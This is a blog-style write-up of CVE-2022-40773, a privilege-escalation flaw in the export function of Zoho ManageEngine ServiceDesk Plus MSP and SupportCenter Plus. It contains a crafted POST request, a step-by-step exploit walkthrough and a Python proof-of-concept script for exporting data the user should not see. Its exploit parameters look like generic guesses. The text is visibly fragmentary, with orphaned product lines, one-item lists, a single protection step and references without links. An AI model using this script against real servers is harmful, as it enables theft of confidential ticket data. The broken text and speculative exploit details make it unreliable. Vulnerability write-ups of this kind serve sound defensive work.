In 2022, a serious vulnerability was found in Zoho's ManageEngine ServiceDesk Plus MSP (before version 10609) and SupportCenter Plus (before version 11025). This bug, identified as CVE-2022-40773, allows attackers to perform privilege escalation by exploiting the export functionality. Through this loophole, a user could access sensitive data during an "exportMickeyList" operation, even if they typically shouldn't have permission.

In this exclusive post, we'll break down what this vulnerability is, how it can be exploited, and what organizations should do to protect themselves. We'll also walk through a simplified exploit example and provide links to the original advisories for anyone wanting to dig deeper.

SupportCenter Plus (versions before 11025)

Under certain circumstances, an authenticated user (even with lower privileges) could abuse the exportMickeyList feature in the requests listview. This export process was not properly restricting what data users could export, exposing sensitive information such as internal notes, comments, or even other users’ data.

Official References

- Zoho Security Advisory for ServiceDesk Plus MSP (CVE-2022-40773)
- Zoho Security Advisory for SupportCenter Plus

The Vulnerable Function

At the heart of this bug is the exportMickeyList endpoint. In simple terms, this endpoint allows users to export a list of requests to various formats (like CSV or Excel). However, the access control checks for this export weren’t thorough, opening a pathway for attackers.

A normal, low-privileged user could send a specially-crafted request to export more data than they should.

Example Vulnerable Request (Pseudo-code)

POST /servlets/RequestServlet
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=<valid-session>

operation=exportMickeyList&module=Request&exportType=CSV&filter=<custom_filter>

If the filter parameter is manipulated, the user can export data fields (such as internal comments, or tickets from other departments) typically hidden from them.

Exploit Walkthrough

Step 1: Log into the web interface as a low-privilege user.
Step 2: Intercept the request when using the list view export button (using a proxy like Burp Suite).
Step 3: Modify the POST request to alter the filter, field list, or module to include data you’re not supposed to see.
Step 4: Submit the request and download the export file.
Step 5: Open the CSV/XLS and review the sensitive data.

Example Exploit Code (Python Proof of Concept)

The following script demonstrates a simplified approach. It assumes valid credentials and session cookies.

import requests

url = "https://target.example.com/servlets/RequestServlet";
cookies = {'JSESSIONID': 'valid_session_id'}

payload = {
    "operation": "exportMickeyList",
    "module": "Request",
    "exportType": "CSV",
    # Optionally manipulate these to grab more/other data
    "filter": "all",
    "columnList": "all"
}

response = requests.post(url, data=payload, cookies=cookies)
if response.status_code == 200:
    with open("exported_data.csv", "wb") as f:
        f.write(response.content)
    print("[+] Export Complete: Check 'exported_data.csv'")
else:
    print("[-] Export failed:", response.status_code)

Note: In a real-world attack, the filter and columnList could be adjusted to include specific hidden attributes.

Why Does This Matter?

Privilege escalation vulnerabilities are a big deal. They allow users to bypass normal controls and get access to data or functionality usually off-limits. In busy IT helpdesk environments, this could mean exposure of:

Confidential company issues

If exploited by a malicious insider (or someone with stolen credentials), the consequences could be severe—ranging from data leaks to regulatory consequences.

SupportCenter Plus version 11025 and up

These updates fix the access control flaw by tightening up who can export what data.

How to Protect Yourself

1. Update Immediately: Ensure you are running ServiceDesk Plus MSP 10609 or newer, and SupportCenter Plus 11025 or newer.

Summary of Zoho’s Guidance:

- ServiceDesk Plus MSP update guide
- SupportCenter Plus update guide

Final Thoughts

CVE-2022-40773 is a classic example of why zero trust and the principle of least privilege are critical. All access points, even seemingly "normal" export features, need proper security checks.

If you’re running an affected version, patch now and check for signs of abuse. Vulnerabilities like these are often easy targets for attackers once they go public.

Extra Reading

- Official CVE entry from NIST
- Zoho’s PitStop advisory

Timeline

Published on: 11/12/2022 04:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC